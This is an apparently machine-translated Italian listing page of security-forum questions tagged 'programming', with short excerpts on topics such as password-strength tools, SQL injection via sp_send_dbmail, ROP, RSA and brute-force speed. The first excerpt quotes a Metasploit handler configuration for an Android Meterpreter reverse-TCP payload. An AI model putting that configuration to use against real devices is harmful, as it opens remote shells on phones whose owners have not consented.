Domande con tag 'programming'

1
risposta

Programmazione Metasploit

Provo a creare Metasploit AutoRunScript per Android. Il primo file .rc ha questa configurazione use exploit/multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST xxx.xxx.xxx.xxx (my IP) set LPORT 4545 set AutoRunScript multi_cons...
posta 10.09.2018 - 18:43
0
risposte

Problemi nell'installazione di zxcvbn [chiuso]

Sono uno studente delle scuole superiori che conduce un progetto di fiera scientifica che analizza la forza della password della persona media. Ho deciso di utilizzare la versione Java di zxcvbn, nbvcxz , per stimare la forza della password. Ho...
posta 29.12.2017 - 21:11
1
risposta

Come funziona l'opzione ipv4 "record route"? [chiuso]

Come scritto nella RFC 791 questa opzione è utile per registrare gli indirizzi dei router che IP datagramma. Invio un datagramma ip con un ICMP messaggio echo, ho impostato l'opzione digitare (dell'ip di intestazione) su 7, la lunghezza d...
posta 13.06.2017 - 12:21
0
risposte

Voglio sapere se esiste una vulnerabilità nell'utilizzo di sp_send_dbmail di SQL Server?

Sto utilizzando la successiva stored procedure sp_send_dbmail in SQL Server 2012, l'amministratore di sistema mi chiede se è possibile eseguire SQL Injection utilizzando questo SP o l'iniezione SMTP? Nella configurazione di Database...
posta 14.06.2017 - 19:59
0
risposte

Librerie, funzioni e strumenti che aiutano nella programmazione sicura di C / C ++ su Linux [chiuso]

Quando scrivi software in un linguaggio come C / C ++, quali strumenti / librerie / funzioni sono disponibili per rendere il programma più sicuro dallo sfruttamento su Linux? Ad esempio: si può usare chroot() e setuid() per vincolar...
posta 27.12.2016 - 00:34
1
risposta

RSA: gli stessi simboli in testo semplice danno gli stessi simboli testo cifrato?

Ho appena iniziato a studiare Information Security, ma ho appena eseguito questo programma: link e affrontato questa strana cosa. Per i tasti piccoli (non provare a eseguirlo per primi enormi, non dà un buon risultato), come 211 e 223, i...
posta 18.05.2015 - 21:33
2
risposte

L'impedimento degli attacchi di overflow del buffer impedisce gli attacchi ROP?

Prevenire gli attacchi di overflow del buffer impedire attacchi Return Oriented Programming (ROP)?     
posta 03.03.2015 - 00:17
3
risposte

Perché la sicurezza viene generalmente trascurata nel codice dell'applicazione fino a quando non è troppo tardi? [chiuso]

I programmatori non ricevono formazione sulla sicurezza, è dovuto ai costi? Come possiamo superare il problema di esternalità?     
posta 16.02.2017 - 17:45
4
risposte

Tieni traccia di chi trapela il tuo software

Sto rilasciando alcuni software in python che è impossibile cifrare completamente. Stavo pensando di cambiare leggermente i nomi delle variabili per ogni copia che rilascio. È un buon modo per capire chi sta perdendo il mio software? Le probabil...
posta 19.08.2018 - 15:13
1
risposta

In che modo gli hacker possono ottenere 1 miliardo di password al secondo?

Quindi sono interessato agli attacchi Brute Force e li ho creati con Python 3 e C ++. Tuttavia, questi hanno raggiunto un massimo di circa 20 milioni di password al secondo. So per certo che è stato raggiunto 1 miliardo di password al secondo...
posta 10.04.2018 - 12:33